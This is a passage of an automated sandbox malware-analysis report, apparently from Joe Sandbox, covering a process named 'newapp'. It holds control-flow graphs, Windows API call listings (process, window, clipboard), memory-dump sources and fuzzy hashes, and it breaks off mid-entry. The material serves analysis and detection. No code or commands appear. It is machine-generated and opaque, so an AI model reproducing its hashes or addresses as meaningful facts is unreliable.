                                                                                                                control_flow_graph 0 67fadb0-67fadce 1 67fadd0-67fadd3 0->1 2 67fadf6-67fadf9 1->2 3 67fadd5-67fadf1 1->3 4 67fadfb-67fadff 2->4 5 67fae0a-67fae0d 2->5 3->2 7 67fafdc-67fafe6 4->7 8 67fae05 4->8 9 67fae0f-67fae18 5->9 10 67fae1d-67fae20 5->10 8->5 9->10 11 67fafcd-67fafd6 10->11 12 67fae26-67fae29 10->12 11->7 16 67fae6c-67fae75 11->16 14 67fae3d-67fae40 12->14 15 67fae2b-67fae38 12->15 19 67fae5a-67fae5d 14->19 20 67fae42-67fae55 14->20 15->14 17 67fae7b-67fae7f 16->17 18 67fafe7-67fb01e 16->18 23 67fae84-67fae86 17->23 29 67fb020-67fb023 18->29 21 67fae5f-67fae64 19->21 22 67fae67-67fae6a 19->22 20->19 21->22 22->16 22->23 27 67fae8d-67fae90 23->27 28 67fae88 23->28 27->1 30 67fae96-67faeba 27->30 28->27 31 67fb025 call 67fb307 29->31 32 67fb032-67fb035 29->32 47 67fafca 30->47 48 67faec0-67faecf 30->48 38 67fb02b-67fb02d 31->38 33 67fb29e-67fb2a1 32->33 34 67fb03b-67fb076 32->34 36 67fb2ae-67fb2b1 33->36 37 67fb2a3-67fb2ad 33->37 45 67fb07c-67fb088 34->45 46 67fb269-67fb27c 34->46 39 67fb2d4-67fb2d7 36->39 40 67fb2b3-67fb2cf 36->40 38->32 43 67fb2d9-67fb2dd 39->43 44 67fb2e8-67fb2ea 39->44 40->39 43->34 51 67fb2e3 43->51 52 67fb2ec 44->52 53 67fb2f1-67fb2f4 44->53 57 67fb08a-67fb0a3 45->57 58 67fb0a8-67fb0ec 45->58 49 67fb27e 46->49 47->11 59 67faee7-67faf22 call 67f6690 48->59 60 67faed1-67faed7 48->60 49->33 51->44 52->53 53->29 54 67fb2fa-67fb304 53->54 57->49 77 67fb0ee-67fb100 58->77 78 67fb108-67fb147 58->78 75 67faf3a-67faf51 59->75 76 67faf24-67faf2a 59->76 62 67faedb-67faedd 60->62 63 67faed9 60->63 62->59 63->59 90 67faf69-67faf7a 75->90 91 67faf53-67faf59 75->91 79 67faf2e-67faf30 76->79 80 67faf2c 76->80 77->78 84 67fb22e-67fb243 78->84 85 67fb14d-67fb228 call 67f6690 78->85 79->75 80->75 84->46 85->84 97 67faf7c-67faf82 90->97 98 67faf92-67fafc3 90->98 93 67faf5d-67faf5f 91->93 94 67faf5b 91->94 93->90 94->90 99 67faf86-67faf88 97->99 100 67faf84 97->100 98->47 99->98 100->98
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-3823777903
                                                                                                                • Opcode ID: 59969acbc22c1950587c51024316d6c9bc3a44d88a4cb135d9a81d63d45629be
                                                                                                                • Instruction ID: 05ebe694a395e6c174d412c1ab59e23f23e3ce46d0c038346966e86280653e95
                                                                                                                • Opcode Fuzzy Hash: 59969acbc22c1950587c51024316d6c9bc3a44d88a4cb135d9a81d63d45629be
                                                                                                                • Instruction Fuzzy Hash: DDE16D30E2020ACFCF55DFA9D594AAEB7B2FF85704F248529D5099B354DB31D846CB81
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2392861976
                                                                                                                • Opcode ID: 403f62111d813f7e2b7b5171023f803970118d6eea445bcf24c82784fd52ad61
                                                                                                                • Instruction ID: 4a59073bcc0d77f027daadcb405e3b07ea7d6314a3235a4bfcb0a7b19b4a59e3
                                                                                                                • Opcode Fuzzy Hash: 403f62111d813f7e2b7b5171023f803970118d6eea445bcf24c82784fd52ad61
                                                                                                                • Instruction Fuzzy Hash: 6E027C30E202098FDBA4DF68D580AADB7B2FF85B10F24896AD505DB355DB31DC86CB91

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 427 67ea247-67ea249 428 67ea2ae-67ea337 GetCurrentProcess 427->428 429 67ea24b-67ea251 427->429 441 67ea339-67ea33f 428->441 442 67ea340-67ea374 GetCurrentThread 428->442 430 67ea25a-67ea262 429->430 431 67ea254-67ea256 429->431 433 67ea26a-67ea271 430->433 434 67ea264-67ea266 430->434 431->430 435 67ea27a-67ea27f 433->435 436 67ea274-67ea279 433->436 434->433 440 67eb790-67eb7cc 435->440 436->435 443 67eb87c-67eb89c call 67e4134 440->443 444 67eb7d2-67eb7d7 440->444 441->442 448 67ea37d-67ea3b1 GetCurrentProcess 442->448 449 67ea376-67ea37c 442->449 456 67eb89f-67eb8ac 443->456 446 67eb82a-67eb862 CallWindowProcW 444->446 447 67eb7d9-67eb810 444->447 450 67eb86b-67eb87a 446->450 451 67eb864-67eb86a 446->451 461 67eb819-67eb828 447->461 462 67eb812-67eb818 447->462 454 67ea3ba-67ea3d5 call 67ea479 448->454 455 67ea3b3-67ea3b9 448->455 449->448 450->456 451->450 460 67ea3db-67ea40a GetCurrentThreadId 454->460 455->454 464 67ea40c-67ea412 460->464 465 67ea413-67ea475 460->465 461->456 462->461 464->465 465->440
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 067EA326
                                                                                                                • GetCurrentThread.KERNEL32 ref: 067EA363
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 067EA3A0
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 067EA3F9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                • Opcode ID: b3e787083555efbb3cb3bf5028f77c098309259ab9153dd6364ce1e5e86cb541
                                                                                                                • Instruction ID: aafc1263cdc289d21f17c8756ee77d010e86a2b308c3fe6df0efe361e473ed37
                                                                                                                • Opcode Fuzzy Hash: b3e787083555efbb3cb3bf5028f77c098309259ab9153dd6364ce1e5e86cb541
                                                                                                                • Instruction Fuzzy Hash: 659167B09003498FDB44DFA9D948BEEBFF1EB88314F24C46AD059A7261D7349948CFA5

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 473 67ea299-67ea2a6 474 67ea2ae-67ea337 GetCurrentProcess 473->474 475 67ea2a8-67ea2ad 473->475 479 67ea339-67ea33f 474->479 480 67ea340-67ea374 GetCurrentThread 474->480 475->474 479->480 481 67ea37d-67ea3b1 GetCurrentProcess 480->481 482 67ea376-67ea37c 480->482 484 67ea3ba-67ea3d5 call 67ea479 481->484 485 67ea3b3-67ea3b9 481->485 482->481 487 67ea3db-67ea40a GetCurrentThreadId 484->487 485->484 489 67ea40c-67ea412 487->489 490 67ea413-67eb7cc 487->490 489->490 497 67eb87c-67eb89c call 67e4134 490->497 498 67eb7d2-67eb7d7 490->498 505 67eb89f-67eb8ac 497->505 500 67eb82a-67eb862 CallWindowProcW 498->500 501 67eb7d9-67eb810 498->501 502 67eb86b-67eb87a 500->502 503 67eb864-67eb86a 500->503 508 67eb819-67eb828 501->508 509 67eb812-67eb818 501->509 502->505 503->502 508->505 509->508
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 067EA326
                                                                                                                • GetCurrentThread.KERNEL32 ref: 067EA363
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 067EA3A0
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 067EA3F9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                • Opcode ID: edecce06ad19ab7ada2fceef36032c86405ca4e13e59b186e899e82b1208b3d6
                                                                                                                • Instruction ID: 1603a78821fc976a33fd49b0b4206afbfeb7f319f3525e4634cbc491ee09b732
                                                                                                                • Opcode Fuzzy Hash: edecce06ad19ab7ada2fceef36032c86405ca4e13e59b186e899e82b1208b3d6
                                                                                                                • Instruction Fuzzy Hash: 2C5148B09003498FDB54DFAAD948BDEBFF1AF49304F20C469E059A72A1D7349984CF66

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 512 67ea2a8-67ea337 GetCurrentProcess 517 67ea339-67ea33f 512->517 518 67ea340-67ea374 GetCurrentThread 512->518 517->518 519 67ea37d-67ea3b1 GetCurrentProcess 518->519 520 67ea376-67ea37c 518->520 522 67ea3ba-67ea40a call 67ea479 GetCurrentThreadId 519->522 523 67ea3b3-67ea3b9 519->523 520->519 527 67ea40c-67ea412 522->527 528 67ea413-67eb7cc 522->528 523->522 527->528 535 67eb87c-67eb89c call 67e4134 528->535 536 67eb7d2-67eb7d7 528->536 543 67eb89f-67eb8ac 535->543 538 67eb82a-67eb862 CallWindowProcW 536->538 539 67eb7d9-67eb810 536->539 540 67eb86b-67eb87a 538->540 541 67eb864-67eb86a 538->541 546 67eb819-67eb828 539->546 547 67eb812-67eb818 539->547 540->543 541->540 546->543 547->546
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 067EA326
                                                                                                                • GetCurrentThread.KERNEL32 ref: 067EA363
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 067EA3A0
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 067EA3F9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                • Opcode ID: d4108158af6221d12ead28426835f74b80f1d78c7922afcba6fd87168e89bbfe
                                                                                                                • Instruction ID: 6057e95b241a40ae91ac2fc3998b4a914c4143b4bc00912acfc56d5eb94536e7
                                                                                                                • Opcode Fuzzy Hash: d4108158af6221d12ead28426835f74b80f1d78c7922afcba6fd87168e89bbfe
                                                                                                                • Instruction Fuzzy Hash: 1F5126B09002098FDB54DFAAD948BDEBBF1EF48314F20C469E459A7260D7359984CF66

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 550 67f9238-67f925d 551 67f925f-67f9262 550->551 552 67f9268-67f927d 551->552 553 67f9b20-67f9b23 551->553 559 67f927f-67f9285 552->559 560 67f9295-67f92ab 552->560 554 67f9b49-67f9b4b 553->554 555 67f9b25-67f9b44 553->555 557 67f9b4d 554->557 558 67f9b52-67f9b55 554->558 555->554 557->558 558->551 562 67f9b5b-67f9b65 558->562 563 67f9289-67f928b 559->563 564 67f9287 559->564 567 67f92b6-67f92b8 560->567 563->560 564->560 568 67f92ba-67f92c0 567->568 569 67f92d0-67f9341 567->569 570 67f92c4-67f92c6 568->570 571 67f92c2 568->571 580 67f936d-67f9389 569->580 581 67f9343-67f9366 569->581 570->569 571->569 586 67f938b-67f93ae 580->586 587 67f93b5-67f93d0 580->587 581->580 586->587 592 67f93fb-67f9416 587->592 593 67f93d2-67f93f4 587->593 598 67f943b-67f9449 592->598 599 67f9418-67f9434 592->599 593->592 600 67f944b-67f9454 598->600 601 67f9459-67f94d3 598->601 599->598 600->562 607 67f94d5-67f94f3 601->607 608 67f9520-67f9535 601->608 612 67f950f-67f951e 607->612 613 67f94f5-67f9504 607->613 608->553 612->607 612->608 613->612
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2125118731
                                                                                                                • Opcode ID: 60d7dfc1cb755ed81dbff7e149326a54b32adf4c24c2511cdb2785631c2eff36
                                                                                                                • Instruction ID: 90a7a9873de9c5ab55607c9834feae19ab56873d7063756dfa09a9eb4657789f
                                                                                                                • Opcode Fuzzy Hash: 60d7dfc1cb755ed81dbff7e149326a54b32adf4c24c2511cdb2785631c2eff36
                                                                                                                • Instruction Fuzzy Hash: 9F915C30F1021A9FDB94DF65D950BAEB7F6AFC8204F508569C50DEB388EA719C428B91

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 616 67fd038-67fd053 617 67fd055-67fd058 616->617 618 67fd05a-67fd09c 617->618 619 67fd0a1-67fd0a4 617->619 618->619 620 67fd0ed-67fd0f0 619->620 621 67fd0a6-67fd0e8 619->621 623 67fd0ff-67fd102 620->623 624 67fd0f2-67fd0f4 620->624 621->620 628 67fd14b-67fd14e 623->628 629 67fd104-67fd113 623->629 626 67fd0fa 624->626 627 67fd521 624->627 626->623 633 67fd524-67fd530 627->633 630 67fd197-67fd19a 628->630 631 67fd150-67fd192 628->631 634 67fd115-67fd11a 629->634 635 67fd122-67fd12e 629->635 636 67fd19c-67fd1a1 630->636 637 67fd1a4-67fd1a7 630->637 631->630 633->629 641 67fd536-67fd823 633->641 634->635 638 67fda55-67fda62 635->638 639 67fd134-67fd146 635->639 636->637 642 67fd1a9-67fd1ab 637->642 643 67fd1b6-67fd1b9 637->643 659 67fda6a 638->659 660 67fda64-67fda68 638->660 639->628 833 67fda4a-67fda54 641->833 834 67fd829-67fd82f 641->834 648 67fd3df-67fd3e8 642->648 649 67fd1b1 642->649 643->633 651 67fd1bf-67fd1c2 643->651 656 67fd3ea-67fd3ef 648->656 657 67fd3f7-67fd403 648->657 649->643 653 67fd1e5-67fd1e8 651->653 654 67fd1c4-67fd1e0 651->654 665 67fd1ea-67fd22c 653->665 666 67fd231-67fd234 653->666 654->653 656->657 667 67fd409-67fd41d 657->667 668 67fd514-67fd519 657->668 661 67fda6c-67fda71 659->661 662 67fda72-67fda8e 659->662 660->659 661->662 669 67fda90-67fda93 662->669 665->666 671 67fd27d-67fd280 666->671 672 67fd236-67fd278 666->672 667->627 684 67fd423-67fd435 667->684 668->627 677 67fdac6-67fdac9 669->677 678 67fda95-67fdac1 669->678 680 67fd2c9-67fd2cc 671->680 681 67fd282-67fd2c4 671->681 672->671 687 67fdacb call 67fdbad 677->687 688 67fdad8-67fdadb 677->688 678->677 685 67fd2ce-67fd2e4 680->685 686 67fd2e9-67fd2ec 680->686 681->680 709 67fd459-67fd45b 684->709 710 67fd437-67fd43d 684->710 685->686 694 67fd2ee-67fd330 686->694 695 67fd335-67fd338 686->695 706 67fdad1-67fdad3 687->706 697 67fdafe-67fdb00 688->697 698 67fdadd-67fdaf9 688->698 694->695 704 67fd33a-67fd37c 695->704 705 67fd381-67fd384 695->705 699 67fdb07-67fdb0a 697->699 700 67fdb02 697->700 698->697 699->669 708 67fdb0c-67fdb1b 699->708 700->699 704->705 712 67fd3cd-67fd3cf 705->712 713 67fd386-67fd395 705->713 706->688 737 67fdb1d-67fdb80 call 67f6690 708->737 738 67fdb82-67fdb97 708->738 730 67fd465-67fd471 709->730 719 67fd43f 710->719 720 67fd441-67fd44d 710->720 725 67fd3d6-67fd3d9 712->725 726 67fd3d1 712->726 722 67fd397-67fd39c 713->722 723 67fd3a4-67fd3b0 713->723 728 67fd44f-67fd457 719->728 720->728 722->723 723->638 731 67fd3b6-67fd3c8 723->731 725->617 725->648 726->725 728->730 752 67fd47f 730->752 753 67fd473-67fd47d 730->753 731->712 737->738 758 67fdb98 738->758 757 67fd484-67fd486 752->757 753->757 757->627 762 67fd48c-67fd4a8 call 67f6690 757->762 758->758 773 67fd4aa-67fd4af 762->773 774 67fd4b7-67fd4c3 762->774 773->774 774->668 776 67fd4c5-67fd512 774->776 776->627 835 67fd83e-67fd847 834->835 836 67fd831-67fd836 834->836 835->638 837 67fd84d-67fd860 835->837 836->835 839 67fda3a-67fda44 837->839 840 67fd866-67fd86c 837->840 839->833 839->834 841 67fd86e-67fd873 840->841 842 67fd87b-67fd884 840->842 841->842 842->638 843 67fd88a-67fd8ab 842->843 846 67fd8ad-67fd8b2 843->846 847 67fd8ba-67fd8c3 843->847 846->847 847->638 848 67fd8c9-67fd8e6 847->848 848->839 851 67fd8ec-67fd8f2 848->851 851->638 852 67fd8f8-67fd911 851->852 854 67fda2d-67fda34 852->854 855 67fd917-67fd93e 852->855 854->839 854->851 855->638 858 67fd944-67fd94e 855->858 858->638 859 67fd954-67fd96b 858->859 861 67fd96d-67fd978 859->861 862 67fd97a-67fd995 859->862 861->862 862->854 867 67fd99b-67fd9b4 call 67f6690 862->867 871 67fd9b6-67fd9bb 867->871 872 67fd9c3-67fd9cc 867->872 871->872 872->638 873 67fd9d2-67fda26 872->873 873->854
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q
                                                                                                                • API String ID: 0-831282457
                                                                                                                • Opcode ID: 069dbbebaae3c063c75321c0bb61104db787ae49ff504e138a0d8bb2f8e6c94c
                                                                                                                • Instruction ID: 16645a3253cafb0500332f37db61783af38cfc2ae5f79821522f708dad8862ac
                                                                                                                • Opcode Fuzzy Hash: 069dbbebaae3c063c75321c0bb61104db787ae49ff504e138a0d8bb2f8e6c94c
                                                                                                                • Instruction Fuzzy Hash: AF623530A502058FCB55EF68D590A5EB7F2FF84304F148A69D1099F369EB71ED4ACB81

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 881 67f4c78-67f4c9c 882 67f4c9e-67f4ca1 881->882 883 67f4ca3-67f4cbd 882->883 884 67f4cc2-67f4cc5 882->884 883->884 885 67f4ccb-67f4dc3 884->885 886 67f53a4-67f53a6 884->886 904 67f4dc9-67f4e16 call 67f5523 885->904 905 67f4e46-67f4e4d 885->905 888 67f53ad-67f53b0 886->888 889 67f53a8 886->889 888->882 891 67f53b6-67f53c3 888->891 889->888 918 67f4e1c-67f4e38 904->918 906 67f4e53-67f4ec3 905->906 907 67f4ed1-67f4eda 905->907 924 67f4ece 906->924 925 67f4ec5 906->925 907->891 921 67f4e3a 918->921 922 67f4e43 918->922 921->922 922->905 924->907 925->924
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: fcq$XPcq$\Ocq
                                                                                                                • API String ID: 0-3575482020
                                                                                                                • Opcode ID: 209927f0ecf55b82179c3448404be11f760d00d53c77db1b982fdd5ff60cdb5d
                                                                                                                • Instruction ID: beb629072e3b6ffd2769bee8c32b4e8df86f14c63517b62275194bc93ee165e6
                                                                                                                • Opcode Fuzzy Hash: 209927f0ecf55b82179c3448404be11f760d00d53c77db1b982fdd5ff60cdb5d
                                                                                                                • Instruction Fuzzy Hash: 04616F70E102199FEB549FB8C854BAEBBF6FF88700F20852AE105AB395DB754C458B91

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1343 67f9228-67f922a 1344 67f922c-67f922e 1343->1344 1345 67f9232-67f9234 1343->1345 1347 67f9236-67f925d 1344->1347 1348 67f9230 1344->1348 1345->1347 1350 67f925f-67f9262 1347->1350 1348->1345 1351 67f9268-67f927d 1350->1351 1352 67f9b20-67f9b23 1350->1352 1358 67f927f-67f9285 1351->1358 1359 67f9295-67f92ab 1351->1359 1353 67f9b49-67f9b4b 1352->1353 1354 67f9b25-67f9b44 1352->1354 1356 67f9b4d 1353->1356 1357 67f9b52-67f9b55 1353->1357 1354->1353 1356->1357 1357->1350 1361 67f9b5b-67f9b65 1357->1361 1362 67f9289-67f928b 1358->1362 1363 67f9287 1358->1363 1366 67f92b6-67f92b8 1359->1366 1362->1359 1363->1359 1367 67f92ba-67f92c0 1366->1367 1368 67f92d0-67f9341 1366->1368 1369 67f92c4-67f92c6 1367->1369 1370 67f92c2 1367->1370 1379 67f936d-67f9389 1368->1379 1380 67f9343-67f9366 1368->1380 1369->1368 1370->1368 1385 67f938b-67f93ae 1379->1385 1386 67f93b5-67f93d0 1379->1386 1380->1379 1385->1386 1391 67f93fb-67f9416 1386->1391 1392 67f93d2-67f93f4 1386->1392 1397 67f943b-67f9449 1391->1397 1398 67f9418-67f9434 1391->1398 1392->1391 1399 67f944b-67f9454 1397->1399 1400 67f9459-67f94d3 1397->1400 1398->1397 1399->1361 1406 67f94d5-67f94f3 1400->1406 1407 67f9520-67f9535 1400->1407 1411 67f950f-67f951e 1406->1411 1412 67f94f5-67f9504 1406->1412 1407->1352 1411->1406 1411->1407 1412->1411
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q
                                                                                                                • API String ID: 0-355816377
                                                                                                                • Opcode ID: 3ae14609df4b6e20e8f7f0a3a0c8f79b24da39f254bef2314c062cc96ada548c
                                                                                                                • Instruction ID: 16ba1d09c67e59875cc8315e77760f2c1861a8020d226115c780db623f7d120d
                                                                                                                • Opcode Fuzzy Hash: 3ae14609df4b6e20e8f7f0a3a0c8f79b24da39f254bef2314c062cc96ada548c
                                                                                                                • Instruction Fuzzy Hash: A3514F30B102059FDB54DB74D990BBFB7F6EBC8648F508529C609EB788EA31DC428B95
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: fcq$XPcq
                                                                                                                • API String ID: 0-936005338
                                                                                                                • Opcode ID: 712f9f5b31308fdc1871d7486d2bac4a401d85b352cb726b1713b7e1eeec16a6
                                                                                                                • Instruction ID: 033e85734455463f5964e5fb2aa17ae4aee4905b1c3795f8e437e1821ab94d0e
                                                                                                                • Opcode Fuzzy Hash: 712f9f5b31308fdc1871d7486d2bac4a401d85b352cb726b1713b7e1eeec16a6
                                                                                                                • Instruction Fuzzy Hash: 5A515B70F102099BDB55DFB9C854BAEBBF7FF88700F20852AE145AB395DA718C018B91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2925048973.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_2920000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 944cc304b9676237929bb2ad023be25a3723000198bf2213e92f7b8e30f5310c
                                                                                                                • Instruction ID: dadffc4381a8e5e2d6fe3a3c9beb1562eb1ecbd1ae8dedd5ef693d6ed9c03579
                                                                                                                • Opcode Fuzzy Hash: 944cc304b9676237929bb2ad023be25a3723000198bf2213e92f7b8e30f5310c
                                                                                                                • Instruction Fuzzy Hash: D5415731D043958FC704CF79D8446DEBFF5AF8A310F1885AAD544DB291DB74A844CBA1
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 067E686A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 716092398-0
                                                                                                                • Opcode ID: db28526820dbdd00982cfbc6d314c24e316f448f2ed850843a6f795daf4c1ee3
                                                                                                                • Instruction ID: 428e3728c85a3e8fe0a3b70a5835570cbc9f3ce6a7257c73f62ec1639409b348
                                                                                                                • Opcode Fuzzy Hash: db28526820dbdd00982cfbc6d314c24e316f448f2ed850843a6f795daf4c1ee3
                                                                                                                • Instruction Fuzzy Hash: 4051C0B5D003199FDB14CFA9D884ADEBFB5FF48310F24852AE419AB210D771A885CF91
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 067E686A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 716092398-0
                                                                                                                • Opcode ID: 408a6eb2254ff1ba778ea7c48040d4d0c0da9a14378d4b8c1b6f166410822906
                                                                                                                • Instruction ID: 50c39479e172e042164198dfb2f39b3fce8998160930718227a268de100204e2
                                                                                                                • Opcode Fuzzy Hash: 408a6eb2254ff1ba778ea7c48040d4d0c0da9a14378d4b8c1b6f166410822906
                                                                                                                • Instruction Fuzzy Hash: B141B0B1D003199FDB14CF9AC884ADEBFB5FF48310F24852AE819AB210D775A885CF91
                                                                                                                APIs
                                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 067EB851
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CallProcWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2714655100-0
                                                                                                                • Opcode ID: bff94191dfe1f7a1e764544435344a51030f811ef64893e47398c543313fa30c
                                                                                                                • Instruction ID: 3db5a5f28f3e7469f0f960c4ccfc0eadbe3d23ec664f2c85a48f2da7f001e2fa
                                                                                                                • Opcode Fuzzy Hash: bff94191dfe1f7a1e764544435344a51030f811ef64893e47398c543313fa30c
                                                                                                                • Instruction Fuzzy Hash: F94125B4A00309CFDB54CF99C888AAABBF5FB8C714F24C459D519AB321D334A845CFA0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard
                                                                                                                • String ID:
                                                                                                                • API String ID: 220874293-0
                                                                                                                • Opcode ID: 0efe8f90caea01c7526de476ce3df68559e31eab117d78ac4817f9763844ffca
                                                                                                                • Instruction ID: f1fc19f29e95ee84dee453995f7151c7a06d58aa914d5bd9420ef92ada24c822
                                                                                                                • Opcode Fuzzy Hash: 0efe8f90caea01c7526de476ce3df68559e31eab117d78ac4817f9763844ffca
                                                                                                                • Instruction Fuzzy Hash: 903134B4E01248EFDB14DF99C984BDEBBF5AF48304F248019E404BB294DB746949CF55
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd
                                                                                                                Similarity
